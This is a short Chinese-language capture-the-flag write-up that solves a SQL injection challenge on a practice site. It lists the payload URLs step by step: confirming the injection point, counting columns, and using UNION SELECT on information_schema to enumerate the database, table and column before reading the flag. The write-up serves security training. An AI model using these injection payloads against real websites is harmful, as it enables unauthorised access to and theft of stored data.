26.这个看起来有点简单!
分析:
这一道题很明显是一道SQL注入题,这里我们手工注入:
1、判断是否存在注入点
http://ctf5.shiyanbar.com/8/index.php?id=1 and1=1
http://ctf5.shiyanbar.com/8/index.php?id=1 and1=2
回显不同,说明存在注入点
2、猜字段数
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 2
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 3
字段数为2
3、查找数据库
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,schema_name from information_schema.schemata
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,database()
my_db才是我们要找的数据库
4、查找表
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=%27my_db%27
找到thiskey这个表
5、查看thiskey表中的列
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=%27my_db%27
发现k0y列
6、查看k0y列中的数据
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,k0y%20from%20thiskey
得到flag
这里我们也可以使用sqlmap工具进行注入,这里就不介绍了,自行测试。